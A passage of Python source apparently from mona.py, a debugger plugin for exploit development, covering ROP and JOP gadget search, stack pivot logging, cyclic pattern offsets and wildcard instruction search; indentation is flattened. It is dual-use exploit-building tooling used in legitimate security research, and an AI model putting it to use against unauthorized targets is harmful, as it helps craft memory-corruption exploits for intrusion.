stackpivots_safeseh.setdefault(stackpivotdistance,[[startptr,fullchain]])
else:
stackpivots_safeseh[stackpivotdistance] += [[startptr,fullchain]]
else:
if not stackpivotdistance in stackpivots:
stackpivots.setdefault(stackpivotdistance,[[startptr,fullchain]])
else:
stackpivots[stackpivotdistance] += [[startptr,fullchain]]
else:
if not fast:
ropgadgets[startptr] = fullchain
step = -1
step += 1
thistimestamp = datetime.datetime.now().strftime("%a %Y/%m/%d %I:%M:%S %p")
updatetext = " - Progress update : " + str(tp) + " / " + str(tp) + " items processed (" + thistimestamp + ") - (100%)"
objprogressfile.write(updatetext.strip(),progressfile)
dbg.log(updatetext)
dbg.updateLog()
if mode == "all":
if len(ropgadgets) > 0 and len(interestinggadgets) > 0:
# another round of filtering
updatetext = "[+] Creating suggestions list"
dbg.log(updatetext)
objprogressfile.write(updatetext.strip(),progressfile)
suggestions = getRopSuggestion(interestinggadgets,ropgadgets)
#see if we can propose something
updatetext = "[+] Processing suggestions"
dbg.log(updatetext)
objprogressfile.write(updatetext.strip(),progressfile)
suggtowrite=""
for suggestedtype in suggestions:
limitnr = 0x7fffffff
if suggestedtype.startswith("pop "): # only write up to 10 pop r32 into suggestions file
limitnr = 10
gcnt = 0
suggtowrite += "[%s]\n" % suggestedtype
for suggestedpointer in suggestions[suggestedtype]:
if gcnt < limitnr:
sptr = MnPointer(suggestedpointer)
modname = sptr.belongsTo()
modinfo = MnModule(modname)
if not modinfo.moduleBase.__class__.__name__ == "instancemethod":
rva = suggestedpointer - modinfo.moduleBase
suggesteddata = suggestions[suggestedtype][suggestedpointer]
if not modinfo.moduleBase.__class__.__name__ == "instancemethod":
ptrinfo = "0x" + toHex(suggestedpointer) + " (RVA : 0x" + toHex(rva) + ") : " + suggesteddata + " ** [" + modname + "] ** | " + sptr.__str__()+"\n"
else:
ptrinfo = "0x" + toHex(suggestedpointer) + " : " + suggesteddata + " ** [" + modname + "] ** | " + sptr.__str__()+"\n"
suggtowrite += ptrinfo
else:
break
gcnt += 1
dbg.log("[+] Launching ROP generator")
updatetext = "Attempting to create rop chain proposals"
objprogressfile.write(updatetext.strip(),progressfile)
vplogtxt = createRopChains(suggestions,interestinggadgets,ropgadgets,modulecriteria,criteria,objprogressfile,progressfile)
dbg.logLines(vplogtxt.replace("\t"," "))
dbg.log(" ROP generator finished")
else:
updatetext = "[+] Oops, no gadgets found, aborting.."
dbg.log(updatetext)
objprogressfile.write(updatetext.strip(),progressfile)
#done, write to log files
dbg.setStatusBar("Writing to logfiles...")
dbg.log("")
logfile = MnLog("stackpivot.txt")
thislog = logfile.reset()
objprogressfile.write("Writing " + str(len(stackpivots)+len(stackpivots_safeseh))+" stackpivots with minimum offset " + str(pivotdistance)+" to file " + thislog,progressfile)
dbg.log("[+] Writing stackpivots to file " + thislog)
logfile.write("Stack pivots, minimum distance " + str(pivotdistance),thislog)
logfile.write("-------------------------------------",thislog)
logfile.write("Non-safeSEH protected pivots :",thislog)
logfile.write("------------------------------",thislog)
arrtowrite = ""
pivotcount = 0
try:
with open(thislog,"a") as fh:
arrtowrite = ""
stackpivots_index = sorted(stackpivots) # returns sorted keys as an array
for sdist in stackpivots_index:
for spivot, schain in stackpivots[sdist]:
ptrx = MnPointer(spivot)
modname = ptrx.belongsTo()
sdisthex = "%02x" % sdist
ptrinfo = "0x" + toHex(spivot) + " : {pivot " + str(sdist) + " / 0x" + sdisthex + "} : " + schain + " ** [" + modname + "] ** | " + ptrx.__str__()+"\n"
pivotcount += 1
arrtowrite += ptrinfo
fh.writelines(arrtowrite)
except:
pass
logfile.write("SafeSEH protected pivots :",thislog)
logfile.write("--------------------------",thislog)
arrtowrite = ""
try:
with open(thislog, "a") as fh:
arrtowrite = ""
stackpivots_safeseh_index = sorted(stackpivots_safeseh)
for sdist in stackpivots_safeseh_index:
for spivot, schain in stackpivots_safeseh[sdist]:
ptrx = MnPointer(spivot)
modname = ptrx.belongsTo()
#modinfo = MnModule(modname)
sdisthex = "%02x" % sdist
ptrinfo = "0x" + toHex(spivot) + " : {pivot " + str(sdist) + " / 0x" + sdisthex + "} : " + schain + " ** [" + modname + "] ** | " + ptrx.__str__()+"\n"
pivotcount += 1
arrtowrite += ptrinfo
fh.writelines(arrtowrite)
except:
pass
dbg.log(" Wrote %d pivots to file " % pivotcount)
arrtowrite = ""
if mode == "all":
if len(suggestions) > 0:
logfile = MnLog("rop_suggestions.txt")
thislog = logfile.reset()
objprogressfile.write("Writing all suggestions to file "+thislog,progressfile)
dbg.log("[+] Writing suggestions to file " + thislog )
logfile.write("Suggestions",thislog)
logfile.write("-----------",thislog)
with open(thislog, "a") as fh:
fh.writelines(suggtowrite)
fh.write("\n")
nrsugg = len(suggtowrite.split("\n"))
dbg.log(" Wrote %d suggestions to file" % nrsugg)
if not split:
logfile = MnLog("rop.txt")
thislog = logfile.reset()
objprogressfile.write("Gathering interesting gadgets",progressfile)
dbg.log("[+] Writing results to file " + thislog + " (" + str(len(interestinggadgets))+" interesting gadgets)")
logfile.write("Interesting gadgets",thislog)
logfile.write("-------------------",thislog)
dbg.updateLog()
try:
with open(thislog, "a") as fh:
arrtowrite = ""
for gadget in interestinggadgets:
ptrx = MnPointer(gadget)
modname = ptrx.belongsTo()
#modinfo = MnModule(modname)
ptrinfo = "0x" + toHex(gadget) + " : " + interestinggadgets[gadget] + " ** [" + modname + "] ** | " + ptrx.__str__()+"\n"
arrtowrite += ptrinfo
objprogressfile.write("Writing results to file " + thislog + " (" + str(len(interestinggadgets))+" interesting gadgets)",progressfile)
fh.writelines(arrtowrite)
dbg.log(" Wrote %d interesting gadgets to file" % len(interestinggadgets))
except:
pass
arrtowrite=""
if not fast:
objprogressfile.write("Enumerating other gadgets (" + str(len(ropgadgets))+")",progressfile)
dbg.log("[+] Writing other gadgets to file " + thislog + " (" + str(len(ropgadgets))+" gadgets)")
try:
logfile.write("",thislog)
logfile.write("Other gadgets",thislog)
logfile.write("-------------",thislog)
with open(thislog, "a") as fh:
arrtowrite=""
for gadget in ropgadgets:
ptrx = MnPointer(gadget)
modname = ptrx.belongsTo()
#modinfo = MnModule(modname)
ptrinfo = "0x" + toHex(gadget) + " : " + ropgadgets[gadget] + " ** [" + modname + "] ** | " + ptrx.__str__()+"\n"
arrtowrite += ptrinfo
dbg.log(" Wrote %d other gadgets to file" % len(ropgadgets))
objprogressfile.write("Writing results to file " + thislog + " (" + str(len(ropgadgets))+" other gadgets)",progressfile)
fh.writelines(arrtowrite)
except:
pass
else:
dbg.log("[+] Writing results to individual files (grouped by module)")
dbg.updateLog()
for thismodule in modulestosearch:
thismodname = thismodule.replace(" ","_")
thismodversion = getModuleProperty(thismodule,"version")
logfile = MnLog("rop_"+thismodname+"_"+thismodversion+".txt")
thislog = logfile.reset()
logfile.write("Interesting gadgets",thislog)
logfile.write("-------------------",thislog)
for gadget in interestinggadgets:
ptrx = MnPointer(gadget)
modname = ptrx.belongsTo()
modinfo = MnModule(modname)
thismodversion = getModuleProperty(modname,"version")
thismodname = modname.replace(" ","_")
logfile = MnLog("rop_"+thismodname+"_"+thismodversion+".txt")
thislog = logfile.reset(False)
ptrinfo = "0x" + toHex(gadget) + " : " + interestinggadgets[gadget] + " ** " + modinfo.__str__() + " ** | " + ptrx.__str__()+"\n"
with open(thislog, "a") as fh:
fh.write(ptrinfo)
if not fast:
for thismodule in modulestosearch:
thismodname = thismodule.replace(" ","_")
thismodversion = getModuleProperty(thismodule,"version")
logfile = MnLog("rop_"+thismodname+"_"+thismodversion+".txt")
logfile.write("Other gadgets",thislog)
logfile.write("-------------",thislog)
for gadget in ropgadgets:
ptrx = MnPointer(gadget)
modname = ptrx.belongsTo()
modinfo = MnModule(modname)
thismodversion = getModuleProperty(modname,"version")
thismodname = modname.replace(" ","_")
logfile = MnLog("rop_"+thismodname+"_"+thismodversion+".txt")
thislog = logfile.reset(False)
ptrinfo = "0x" + toHex(gadget) + " : " + ropgadgets[gadget] + " ** " + modinfo.__str__() + " ** | " + ptrx.__str__()+"\n"
with open(thislog, "a") as fh:
fh.write(ptrinfo)
thistimestamp=datetime.datetime.now().strftime("%a %Y/%m/%d %I:%M:%S %p")
objprogressfile.write("Done (" + thistimestamp+")",progressfile)
dbg.log("Done")
return interestinggadgets,ropgadgets,suggestions,vplogtxt
#----- JOP gadget finder ----- #
def findJOPGADGETS(modulecriteria={},criteria={},depth=6):
"""
Searches for jop gadgets
Arguments:
modulecriteria - dictionary with criteria modules need to comply with.
Default settings are : ignore aslr and rebased modules
criteria - dictionary with criteria the pointers need to comply with.
depth - maximum number of instructions to go back
Return:
Output is written to files, containing jop gadgets and suggestions
"""
found_opcodes = {}
all_opcodes = {}
ptr_counter = 0
modulestosearch = getModulesToQuery(modulecriteria)
progressid=toHex(dbg.getDebuggedPid())
progressfilename="_jop_progress_"+dbg.getDebuggedName()+"_"+progressid+".log"
objprogressfile = MnLog(progressfilename)
progressfile = objprogressfile.reset()
dbg.log("[+] Progress will be written to %s" % progressfilename)
dbg.log("[+] Max nr of instructions : %d" % depth)
filesok = 0
usefiles = False
filestouse = []
vplogtxt = ""
suggestions = {}
fast = False
search = []
jopregs = ["EAX","EBX","ECX","EDX","ESI","EDI","EBP"]
offsetval = 0
for jreg in jopregs:
search.append("JMP " + jreg)
search.append("JMP [" + jreg + "]")
for offsetval in range(0, 40+1, 2):
search.append("JMP [" + jreg + "+0x" + toHexByte(offsetval)+"]")
search.append("JMP [ESP]")
for offsetval in range(0, 40+1, 2):
search.append("JMP [ESP+0x" + toHexByte(offsetval) + "]")
dbg.log("[+] Enumerating %d endings in %d module(s)..." % (len(search),len(modulestosearch)))
for thismodule in modulestosearch:
dbg.log(" - Querying module %s" % thismodule)
dbg.updateLog()
#search
found_opcodes = searchInModule(search,thismodule,criteria)
#merge results
all_opcodes = mergeOpcodes(all_opcodes,found_opcodes)
dbg.log(" - Search complete :")
dbg.updateLog()
tp = 0
for endingtype in all_opcodes:
if len(all_opcodes[endingtype]) > 0:
if usefiles:
dbg.log(" Ending : %s, Nr found : %d" % (endingtype,len(all_opcodes[endingtype]) / 2))
tp = tp + len(all_opcodes[endingtype]) / 2
else:
dbg.log(" Ending : %s, Nr found : %d" % (endingtype,len(all_opcodes[endingtype])))
tp = tp + len(all_opcodes[endingtype])
global silent
dbg.log(" - Filtering and mutating %d gadgets" % tp)
dbg.updateLog()
jopgadgets = {}
interestinggadgets = {}
adcnt = 0
tc = 1
issafeseh = False
step = 0
for endingtype in all_opcodes:
if len(all_opcodes[endingtype]) > 0:
for endingtypeptr in all_opcodes[endingtype]:
adcnt += 1
if usefiles:
adcnt = adcnt - 0.5
if adcnt > (tc*1000):
thistimestamp=datetime.datetime.now().strftime("%a %Y/%m/%d %I:%M:%S %p")
updatetext = " - Progress update : " + str(tc*1000) + " / " + str(tp) + " items processed (" + thistimestamp + ") - (" + str((tc*1000*100)/tp)+"%)"
objprogressfile.write(updatetext.strip(),progressfile)
dbg.log(updatetext)
dbg.updateLog()
tc += 1
#first get max backward instruction
thisopcode = dbg.disasmBackward(endingtypeptr,depth+1)
thisptr = thisopcode.getAddress()
# we now have a range to mine
startptr = thisptr
while startptr <= endingtypeptr and startptr != 0x0:
# get the entire chain from startptr to endingtypeptr
thischain = ""
msfchain = []
thisopcodebytes = ""
chainptr = startptr
if isGoodGadgetPtr(startptr,criteria) and not startptr in jopgadgets and not startptr in interestinggadgets:
# new pointer
invalidinstr = False
while chainptr < endingtypeptr and not invalidinstr:
thisopcode = dbg.disasm(chainptr)
thisinstruction = getDisasmInstruction(thisopcode)
if isGoodJopGadgetInstr(thisinstruction) and not isGadgetEnding(thisinstruction,search):
thischain = thischain + " # " + thisinstruction
msfchain.append([chainptr,thisinstruction])
thisopcodebytes = thisopcodebytes + opcodesToHex(thisopcode.getDump().lower())
chainptr = dbg.disasmForwardAddressOnly(chainptr,1)
else:
invalidinstr = True
if endingtypeptr == chainptr and startptr != chainptr and not invalidinstr:
fullchain = thischain + " # " + endingtype
msfchain.append([endingtypeptr,endingtype])
thisopcode = dbg.disasm(endingtypeptr)
thisopcodebytes = thisopcodebytes + opcodesToHex(thisopcode.getDump().lower())
msfchain.append(["raw",thisopcodebytes])
if isInterestingJopGadget(fullchain):
interestinggadgets[startptr] = fullchain
else:
if not fast:
jopgadgets[startptr] = fullchain
startptr = startptr+1
thistimestamp=datetime.datetime.now().strftime("%a %Y/%m/%d %I:%M:%S %p")
updatetext = " - Progress update : " + str(tp) + " / " + str(tp) + " items processed (" + thistimestamp + ") - (100%)"
objprogressfile.write(updatetext.strip(),progressfile)
dbg.log(updatetext)
dbg.updateLog()
logfile = MnLog("jop.txt")
thislog = logfile.reset()
objprogressfile.write("Enumerating gadgets",progressfile)
dbg.log("[+] Writing results to file " + thislog + " (" + str(len(interestinggadgets))+" interesting gadgets)")
logfile.write("Interesting gadgets",thislog)
logfile.write("-------------------",thislog)
dbg.updateLog()
arrtowrite = ""
try:
with open(thislog, "a") as fh:
arrtowrite = ""
for gadget in interestinggadgets:
ptrx = MnPointer(gadget)
modname = ptrx.belongsTo()
modinfo = MnModule(modname)
ptrinfo = "0x" + toHex(gadget) + " : " + interestinggadgets[gadget] + " ** " + modinfo.__str__() + " ** | " + ptrx.__str__()+"\n"
arrtowrite += ptrinfo
objprogressfile.write("Writing results to file " + thislog + " (" + str(len(interestinggadgets))+" interesting gadgets)",progressfile)
fh.writelines(arrtowrite)
except:
pass
return interestinggadgets,jopgadgets,suggestions,vplogtxt
#----- File compare ----- #
def findFILECOMPARISON(modulecriteria={},criteria={},allfiles=[],tomatch="",checkstrict=True,rangeval=0,fast=False):
"""
Compares two or more files generated with mona.py and lists the entries that have been found in all files
Arguments:
modulecriteria = not used
criteria = not used
allfiles = array with filenames to compare
tomatch = variable containing a string each line should contain
checkstrict = Boolean, when set to True, both the pointer and the instructions should be exactly the same
Return:
File containing all matching pointers
"""
dbg.setStatusBar("Comparing files...")
dbg.updateLog()
filenotfound = False
for fcnt in xrange(len(allfiles)):
fname = allfiles[fcnt]
fname = fname.strip()
if os.path.exists(fname):
dbg.log(" - %d. %s" % (fcnt, allfiles[fcnt]))
else:
dbg.log(" ** %s : Does not exist !" % allfiles[fcnt], highlight=1)
filenotfound = True
if filenotfound:
return
objcomparefile = MnLog("filecompare.txt")
comparefile = objcomparefile.reset()
objcomparefilenot = MnLog("filecompare_not.txt")
comparefilenot = objcomparefilenot.reset()
objcomparefilenot.write("Source files:",comparefilenot)
for fcnt in xrange(len(allfiles)):
objcomparefile.write(" - " + str(fcnt)+". "+allfiles[fcnt],comparefile)
objcomparefilenot.write(" - " + str(fcnt)+". "+allfiles[fcnt],comparefilenot)
objcomparefile.write("",comparefile)
objcomparefile.write("Pointers found :",comparefile)
objcomparefile.write("----------------",comparefile)
objcomparefilenot.write("",comparefilenot)
objcomparefilenot.write("Pointers not found :",comparefilenot)
objcomparefilenot.write("-------------------",comparefilenot)
# transform the files into dictionaries
dbg.log("[+] Reading input files ...")
all_input_files = {}
all_pointers = {}
fcnt = 0
for thisfile in allfiles:
filedata = {}
content = []
with open(thisfile,"rb") as inputfile:
content = inputfile.readlines()
pointerlist = []
for thisLine in content:
refpointer,instr = splitToPtrInstr(thisLine)
instr = instr.replace('\n','').replace('\r','').strip(":")
if refpointer != -1 and not refpointer in filedata:
filedata[refpointer] = instr
pointerlist.append(refpointer)
all_input_files[fcnt] = filedata
all_pointers[fcnt] = pointerlist
fcnt += 1
# select smallest one
dbg.log("[+] Finding shortest array, to use as the reference")
shortestarray = 0
shortestlen = 0
for inputfile in all_input_files:
if (len(all_input_files[inputfile]) < shortestlen) or (shortestlen == 0):
shortestlen = len(all_input_files[inputfile])
shortestarray = inputfile
dbg.log(" Reference file: %s (%d pointers)" % (allfiles[shortestarray],shortestlen))
fileorder = []
fileorder.append(shortestarray)
cnt = 0
while cnt <= len(all_input_files):
if not cnt in fileorder:
fileorder.append(cnt)
cnt += 1
remaining = []
fulllist = []
if rangeval == 0:
dbg.log("[+] Starting compare, please wait...")
dbg.updateLog()
fcnt = 1
remaining = all_pointers[shortestarray]
fulllist = all_pointers[shortestarray]
while fcnt < len(fileorder)-1 and len(remaining) > 0:
dbg.log(" Comparing %d reference pointers with %s" % (len(remaining),allfiles[fileorder[fcnt]]))
remaining = list(set(remaining).intersection(set(all_pointers[fileorder[fcnt]])))
fulllist = list(set(fulllist).union(set(all_pointers[fileorder[fcnt]])))
fcnt += 1
else:
dbg.log("[+] Exploding reference list with values within range")
dbg.updateLog()
# create first reference list with ALL pointers within the range
allrefptr = []
reflist = all_pointers[shortestarray]
for refptr in reflist:
start_range = refptr - rangeval
if start_range < 0:
start_range = 0
end_range = refptr + rangeval
if start_range > end_range:
tmp = start_range
start_range = end_range
end_range = tmp
while start_range <= end_range:
if not start_range in allrefptr:
allrefptr.append(start_range)
start_range += 1
# do normal intersection
dbg.log("[+] Starting compare, please wait...")
dbg.updateLog()
s_remaining = allrefptr
s_fulllist = allrefptr
fcnt = 1
while fcnt < len(fileorder)-1 and len(s_remaining) > 0:
s_remaining = list(set(s_remaining).intersection(set(all_pointers[fileorder[fcnt]])))
s_fulllist = list(set(s_fulllist).union(set(all_pointers[fileorder[fcnt]])))
fcnt += 1
for s in s_remaining:
if not s in remaining:
remaining.append(s)
for s in s_fulllist:
if not s in fulllist:
fulllist.append(s)
nonmatching = list(set(fulllist) - set(remaining))
dbg.log(" Total nr of unique pointers : %d" % len(fulllist))
dbg.log(" Nr of matching pointers before filtering : %d" % len(remaining))
dbg.log(" Nr of non-matching pointers before filtering : %d" % len(nonmatching))
dbg.log("[+] Transforming results into output...")
outputlines = ""
outputlines_not = ""
# start building output
remaining.sort()
for remptr in remaining:
if fast:
outputlines += "0x%08x\n" % remptr
else:
thisinstr = all_input_files[shortestarray][remptr]
include = True
if checkstrict:
# check if all entries are the same
fcnt = 1
while (fcnt < len(fileorder)-1) and include:
if thisinstr != all_input_files[fileorder[fcnt]][remptr]:
include = False
fcnt += 1
else:
include = True
if include and (tomatch == "" or tomatch in thisinstr):
outputlines += "0x%08x : %s\n" % (remptr,thisinstr)
for nonptr in nonmatching:
if fast:
outputlines_not += "0x%08x\n" % nonptr
else:
thisinstr = ""
if nonptr in all_input_files[shortestarray]:
thisinstr = all_input_files[shortestarray][nonptr]
outputlines_not += "File(%d) 0x%08x : %s\n" % (shortestarray,nonptr,thisinstr)
for fileindex in all_input_files:
if fileindex != shortestarray:
these_entries = all_input_files[fileindex]
if nonptr in these_entries:
thisinstr = these_entries[nonptr]
outputlines_not += " File (%d). %s\n" % (fileindex,thisinstr)
else:
outputlines_not += " File (%d). Entry not found \n" % fileindex
dbg.log("[+] Writing output to files")
objcomparefile.write(outputlines, comparefile)
objcomparefilenot.write(outputlines_not, comparefilenot)
nrmatching = len(outputlines.split("\n")) - 1
dbg.log(" Wrote %d matching pointers to file" % nrmatching)
dbg.log("[+] Done.")
return
#------------------#
# Heap state #
#------------------#
def getCurrentHeapState():
heapstate = {}
allheaps = []
try:
allheaps = dbg.getHeapsAddress()
except:
allheaps = []
if len(allheaps) > 0:
for heap in allheaps:
objHeap = MnHeap(heap)
thisheapstate = objHeap.getState()
heapstate[heap] = thisheapstate
return heapstate
#------------------#
# Cyclic pattern #
#------------------#
def createPattern(size,args={}):
"""
Create a cyclic (metasploit) pattern of a given size
Arguments:
size - value indicating desired length of the pattern
if value is > 20280, the pattern will repeat itself until it reaches desired length
Return:
string containing the cyclic pattern
"""
char1="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
char2="abcdefghijklmnopqrstuvwxyz"
char3="0123456789"
if "extended" in args:
char3 += ",.;+=-_!&()#@({})[]%" # ascii, 'filename' friendly
if "c1" in args and args["c1"] != "":
char1 = args["c1"]
if "c2" in args and args["c2"] != "":
char2 = args["c2"]
if "c3" in args and args["c3"] != "":
char3 = args["c3"]
if not silent:
if not "extended" in args and size > 20280 and (len(char1) <= 26 or len(char2) <= 26 or len(char3) <= 10):
msg = "** You have asked to create a pattern > 20280 bytes, but with the current settings\n"
msg += "the pattern generator can't create a pattern of " + str(size) + " bytes. As a result,\n"
msg += "the pattern will be repeated for " + str(size-20280)+" bytes until it reaches a length of " + str(size) + " bytes.\n"
msg += "If you want a unique pattern larger than 20280 bytes, please either use the -extended option\n"
msg += "or extend one of the 3 charsets using options -c1, -c2 and/or -c3 **\n"
dbg.logLines(msg,highlight=1)
pattern = []
max = int(size)
while len(pattern) < max:
for ch1 in char1:
for ch2 in char2:
for ch3 in char3:
if len(pattern) < max:
pattern.append(ch1)
if len(pattern) < max:
pattern.append(ch2)
if len(pattern) < max:
pattern.append(ch3)
pattern = "".join(pattern)
return pattern
def findOffsetInPattern(searchpat,size=20280,args = {}):
"""
Check if a given searchpattern can be found in a cyclic pattern
Arguments:
searchpat : the ascii value or hexstr to search for
Return:
entries in the log window, indicating if the pattern was found and at what position
"""
mspattern=""
searchpats = []
modes = []
modes.append("normal")
modes.append("upper")
modes.append("lower")
extratext = ""
patsize=int(size)
if patsize == -1:
size = 500000
patsize = size
global silent
oldsilent=silent
for mode in modes:
silent=oldsilent
if mode == "normal":
silent=True
mspattern=createPattern(size,args)
silent=oldsilent
extratext = " "
elif mode == "upper":
silent=True
mspattern=createPattern(size,args).upper()
silent=oldsilent
extratext = " (uppercase) "
elif mode == "lower":
silent=True
mspattern=createPattern(size,args).lower()
silent=oldsilent
extratext = " (lowercase) "
if len(searchpat)==3:
#register ?
searchpat = searchpat.upper()
regs = dbg.getRegs()
if searchpat in regs:
searchpat = "0x" + toHex(regs[searchpat])
if len(searchpat)==4:
ascipat=searchpat
if not silent:
dbg.log("Looking for %s in pattern of %d bytes" % (ascipat,patsize))
if ascipat in mspattern:
patpos = mspattern.find(ascipat)
if not silent:
dbg.log(" - Pattern %s found in cyclic pattern%sat position %d" % (ascipat,extratext,patpos),highlight=1)
else:
#reversed ?
ascipat_r = ascipat[3]+ascipat[2]+ascipat[1]+ascipat[0]
if ascipat_r in mspattern:
patpos = mspattern.find(ascipat_r)
if not silent:
dbg.log(" - Pattern %s (%s reversed) found in cyclic pattern%sat position %d" % (ascipat_r,ascipat,extratext,patpos),highlight=1)
else:
if not silent:
dbg.log(" - Pattern %s not found in cyclic pattern%s" % (ascipat_r,extratext))
if len(searchpat)==8:
searchpat="0x"+searchpat
if len(searchpat)==10:
hexpat=searchpat
ascipat3 = toAscii(hexpat[8]+hexpat[9])+toAscii(hexpat[6]+hexpat[7])+toAscii(hexpat[4]+hexpat[5])+toAscii(hexpat[2]+hexpat[3])
if not silent:
dbg.log("Looking for %s in pattern of %d bytes" % (ascipat3,patsize))
if ascipat3 in mspattern:
patpos = mspattern.find(ascipat3)
if not silent:
dbg.log(" - Pattern %s (%s) found in cyclic pattern%sat position %d" % (ascipat3,hexpat,extratext,patpos),highlight=1)
else:
#maybe it's reversed
ascipat4=toAscii(hexpat[2]+hexpat[3])+toAscii(hexpat[4]+hexpat[5])+toAscii(hexpat[6]+hexpat[7])+toAscii(hexpat[8]+hexpat[9])
if not silent:
dbg.log("Looking for %s in pattern of %d bytes" % (ascipat4,patsize))
if ascipat4 in mspattern:
patpos = mspattern.find(ascipat4)
if not silent:
dbg.log(" - Pattern %s (%s reversed) found in cyclic pattern%sat position %d" % (ascipat4,hexpat,extratext,patpos),highlight=1)
else:
if not silent:
dbg.log(" - Pattern %s not found in cyclic pattern%s " % (ascipat4,extratext))
def findPatternWild(modulecriteria,criteria,pattern,base,top,patterntype):
"""
Performs a search for instructions, accepting wildcards
Arguments :
modulecriteria - dictionary with criteria modules need to comply with.
criteria - dictionary with criteria the pointers need to comply with.
pattern - the pattern to search for.
base - the base address in memory the search should start at
top - the top address in memory the search should not go beyond
patterntype - type of search to conduct (str or bin)
"""
global silent
rangestosearch = []
tmpsearch = []
allpointers = {}
results = {}
mindistance = 4
maxdistance = 40
if "mindistance" in criteria:
mindistance = criteria["mindistance"]
if "maxdistance" in criteria:
maxdistance = criteria["maxdistance"]
maxdepth = 8
preventbreak = True
if "all" in criteria:
preventbreak = False
if "depth" in criteria:
maxdepth = criteria["depth"]
if not silent:
dbg.log("[+] Type of search: %s" % patterntype)
dbg.log("[+] Searching for matches up to %d instructions deep" % maxdepth)
if len(modulecriteria) > 0:
modulestosearch = getModulesToQuery(modulecriteria)
# convert modules to ranges
for modulename in modulestosearch:
objmod = MnModule(modulename)
mBase = objmod.moduleBase
mTop = objmod.moduleTop
if mBase < base and base < mTop:
mBase = base
if mTop > top:
mTop = top
if mBase >= base and mBase < top:
if not [mBase,mTop] in rangestosearch:
rangestosearch.append([mBase,mTop])
# if no modules were specified, then also add the other ranges (outside modules)
if not "modules" in modulecriteria:
outside = getRangesOutsideModules()
for range in outside:
mBase = range[0]
mTop = range[1]
if mBase < base and base < mTop:
mBase = base
if mTop > top:
mTop = top
if mBase >= base and mBase < top:
if not [mBase,mTop] in rangestosearch:
rangestosearch.append([mBase,mTop])
else:
rangestosearch.append([base,top])
pattern = pattern.replace("'","").replace('"',"").replace(" "," ").replace(", ",",").replace(" ,",",").replace("# ","#").replace(" #","#")
if len(pattern) == 0:
dbg.log("** Invalid search pattern **")
return
# break apart the instructions
# search for the first instruction(s)
allinstructions = pattern.split("#")
instructionparts = []
instrfound = False
for instruction in allinstructions:
instruction = instruction.strip().lower()
if instrfound and instruction != "":
instructionparts.append(instruction)
else:
if instruction != "*" and instruction != "":
instructionparts.append(instruction)
instrfound = True
# remove wildcards placed at the end
for i in rrange(len(instructionparts)):
if instructionparts[i] == "*":
instructionparts.pop(i)
else:
break
# glue simple instructions together if possible
# reset array
allinstructions = []
stopnow = False
mergeinstructions = []
mergestopped = False
mergetxt = ""
for instr in instructionparts:
if instr.find("*") == -1 and instr.find("r32") == -1 and not mergestopped:
mergetxt += instr + "\n"
else:
allinstructions.append(instr)
mergestopped = True
mergetxt = mergetxt.strip("\n")
searchPattern = []
remaining = allinstructions
if mergetxt != "":
searchPattern.append(mergetxt)
else:
# at this point, we're sure the first instruction has some kind of r32 and/or offset variable
# get all of the combinations for this one
# and use them as searchPattern
cnt = 0
stopped = False
for instr in allinstructions:
if instr != "*" and (instr.find("r32") > -1 or instr.find("*") > -1) and not stopped:
if instr.find("r32") > -1:
for reg in dbglib.Registers32BitsOrder:
thisinstr = instr.replace("r32",reg.lower())
if instr.find("*") > -1:
# contains a wildcard offset
startdist = mindistance
while startdist < maxdistance:
operator = ""
if startdist < 0:
operator = "-"
replacewith = operator + "0x%02x" % startdist
thisinstr2 = thisinstr.replace("*",replacewith)
searchPattern.append(thisinstr2)
startdist += 1
else:
searchPattern.append(thisinstr)
else:
# no r32
if instr.find("*") > -1:
# contains a wildcard offset
startdist = mindistance
while startdist < maxdistance:
operator = ""
if startdist < 0:
operator = "-"
replacewith = operator + "0x%02x" % startdist
thisinstr2 = instr.replace("*",replacewith)
searchPattern.append(thisinstr2)
startdist += 1
else:
searchPattern.append(instr)
remaining.pop(cnt)
stopped = True
cnt += 1
# search for all these beginnings
if len(searchPattern) > 0:
if not silent:
dbg.log("[+] Started search (%d start patterns)" % len(searchPattern))
dbg.updateLog()
for ranges in rangestosearch:
mBase = ranges[0]
mTop = ranges[1]
if not silent:
dbg.log("[+] Searching startpattern between 0x%s and 0x%s" % (toHex(mBase),toHex(mTop)))
dbg.updateLog()
oldsilent=silent
silent=True
pointers = searchInRange(searchPattern,mBase,mTop,criteria)
silent=oldsilent
allpointers = mergeOpcodes(allpointers,pointers)
# for each of the findings, see if it contains the other instructions too
# disassemble forward up to 'maxdepth' instructions
for ptrtypes in allpointers:
for ptrs in allpointers[ptrtypes]:
thisline = ""
try:
for depth in xrange(maxdepth):
tinstr = getDisasmInstruction(dbg.disasmForward(ptrs, depth)).lower() + "\n"
if tinstr != "???":
thisline += tinstr
else:
thisline = ""
break
except:
continue
allfound = True
thisline = thisline.strip("\n")
if thisline != "":
parts = thisline.split("\n")
maxparts = len(parts)-1
partcnt = 1
searchfor = ""
remcnt = 0
lastpos = 0
remmax = len(remaining)
while remcnt < remmax:
searchfor = remaining[remcnt]
searchlist = []
if searchfor == "*":
while searchfor == "*" and remcnt < remmax:
searchfor = remaining[remcnt+1]
rangemin = partcnt
rangemax = maxparts
remcnt += 1
else:
rangemin = partcnt
rangemax = partcnt
if searchfor.find("r32") > -1:
for reg in dbglib.Registers32BitsOrder:
searchlist.append(searchfor.replace("r32",reg.lower()))
else:
searchlist.append(searchfor)
partfound = False
while rangemin <= rangemax and not partfound and rangemax <= maxparts:
for searchfor in searchlist:
if parts[rangemin].find(searchfor) > -1:
partfound = True
lastpos = rangemin
partcnt = lastpos # set counter to current position
break
if not partfound and preventbreak:
#check if current instruction would break chain
if wouldBreakChain(parts[rangemin]):
# bail out
partfound = False
break
rangemin += 1
remcnt += 1
partcnt += 1
if not partfound:
allfound = False
break
if allfound:
theline = " # ".join(parts[:lastpos+1])
if theline != "":
if not theline in results:
results[theline] = [ptrs]
else:
results[theline] += [ptrs]
return results
def wouldBreakChain(instruction):
"""
Checks if the given instruction would potentially break the instruction chain
Argument :
instruction: the instruction to check
Returns :
boolean
"""
goodinstruction = isGoodGadgetInstr(instruction)
if goodinstruction:
return False
return True
def findPattern(modulecriteria,criteria,pattern,ptype,base,top,consecutive=False,rangep2p=0,level=0,poffset=0,poffsetlevel=0):
"""
Performs a find in memory for a given pattern
Arguments:
modulecriteria - dictionary with criteria modules need to comply with.
criteria - dictionary with criteria the pointers need to comply with.
One of the criteria can be "p2p", indicating that the search should look for
pointers to pointers to the pattern
pattern - the pattern to search for.
ptype - the type of the pattern, can be 'asc', 'bin', 'ptr', 'instr' or 'file'
If no type is specified, the routine will try to 'guess' the types
